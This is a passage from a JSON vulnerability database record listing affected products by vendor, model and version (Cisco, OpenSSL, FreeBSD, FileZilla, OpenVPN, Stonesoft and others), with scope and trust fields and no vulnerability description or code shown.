            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.0.201"
          },
          {
            "model": "hardware management console for iseries r3.6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "call manager es07",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "95000"
          },
          {
            "model": "hardware management console for pseries r2.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "stonebeat webcluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.4"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0.2"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "275"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "7.0"
          },
          {
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "6000"
          },
          {
            "model": "networks cs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2006.0"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.6(0)"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "3.8"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(0)"
          },
          {
            "model": "ons ios-based blades",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "15454"
          },
          {
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.5"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.7"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "232"
          },
          {
            "model": "messaging storage server",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "76550"
          },
          {
            "model": "hardware management console for iseries r2.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.2"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.3"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.5.0"
          },
          {
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "245"
          },
          {
            "model": "grid engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.5"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.17"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.3"
          },
          {
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.5"
          },
          {
            "model": "financials server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "navision",
            "version": "3.0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0.1"
          },
          {
            "model": "fuji",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1.1"
          },
          {
            "model": "hardware management console for pseries r3.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.4"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "265"
          },
          {
            "model": "intuity lx",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "linux personal oss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.4"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.x"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(1)"
          },
          {
            "model": "unified presence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0(2)"
          },
          {
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.1.3"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.1"
          },
          {
            "model": "access registrar",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "solaris 10 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "networks meridian option 81c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "stonegate ips sensor and analyzer",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.2"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1"
          },
          {
            "model": "linux openexchange server",
            "scope": null,
            "trust": 0.3,
            "vendor": "s u s e",
            "version": null
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.7.1"
          },
          {
            "model": "hardware management console for iseries r3.2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.4"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2(3)"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.3.9"
          },
          {
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3"
          },
          {
            "model": "server 0.9.4d",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.42"
          },
          {
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "model": "stonebeat fullcluster for firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "grid engine update7 1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.2"
          },
          {
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "9"
          },
          {
            "model": "stonebeat securitycluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "hp-ux b.11.11",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.8"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.4"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.1"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.4"
          },
          {
            "model": "servercluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5.2"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "model": "call manager es40",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.19"
          },
          {
            "model": "call manager es50",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.0"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.3"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1.7"
          },
          {
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.2"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.1"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3(3.33)"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.04"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.6"
          },
          {
            "model": "secure acs for windows server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "ids",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2700"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1740"
          },
          {
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1010"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3(5)"
          },
          {
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.659"
          },
          {
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.1"
          },
          {
            "model": "networks communications server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1000"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.4"
          },
          {
            "model": "converged communications server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0.0x64"
          },
          {
            "model": "filezilla",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.22"
          },
          {
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.2"
          },
          {
            "model": "hardware management console for iseries r3.3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "grid engine update1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5"
          },
          {
            "model": "css11500 content services switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.5"
          },
          {
            "model": "s8500 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "project openssl d",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "css11500 content services switch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.50.3.45"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.4"
          },
          {
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-45000"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44900"
          },
          {
            "model": "s8700 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.2"
          },
          {
            "model": "hp-ux b.11.23",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "project openssl beta2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "-stable",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "255"
          },
          {
            "model": "call manager es56",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.0"
          },
          {
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.3"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0x86"
          },
          {
            "model": "predictive dialing system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "11.11"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.3.9"
          },
          {
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-46000"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.0"
          },
          {
            "model": "series airespace wireless lan controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "40003.1.59.24"
          },
          {
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.12"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "17500"
          },
          {
            "model": "hardware management console for iseries r1.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.5"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "3.0"
          },
          {
            "model": "personal",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "unitedlinux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.3"
          },
          {
            "model": "project openssl a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "hat network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "3)4.2"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "1.4.1"
          },
          {
            "model": "predictive dialer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "ftp server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.3.3.1"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(2)"
          },
          {
            "model": "project openssl f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "1.7"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.2"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.0"
          },
          {
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "works common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "model": "series airespace wireless lan controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "20003.1.59.24"
          },
          {
            "model": "-release-p20",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "model": "linux personal x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.3"
          },
          {
            "model": "grid engine update2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3"
          },
          {
            "model": "linux personal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.1"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8"
          },
          {
            "model": "appliance server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "2.0"
          },
          {
            "model": "ciscosecure acs appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1111"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.3"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.193"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.6(1)"
          },
          {
            "model": "filezilla",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.15"
          },
          {
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "secure linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "2.2"
          },
          {
            "model": "security mars",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2.2"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4480"
          },
          {
            "model": "call manager sr1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "model": "unified presence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0"
          },
          {
            "model": "predictive dialing system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "11.0"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.4"
          },
          {
            "model": "project openssl l",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.1"
          },
          {
            "model": "hardware management console for pseries r4.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.4"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.6"
          },
          {
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "ipcop",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.13"
          },
          {
            "model": "insight management agents for tru64 unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.5.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.1"
          },
          {
            "model": "call manager es33",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.2"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.1"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.2.3"
          },
          {
            "model": "s8300 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.0"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.3.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "model": "networks ip address domain manager",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.8"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "model": "f...",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.3"
          },
          {
            "model": "-prerelease",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
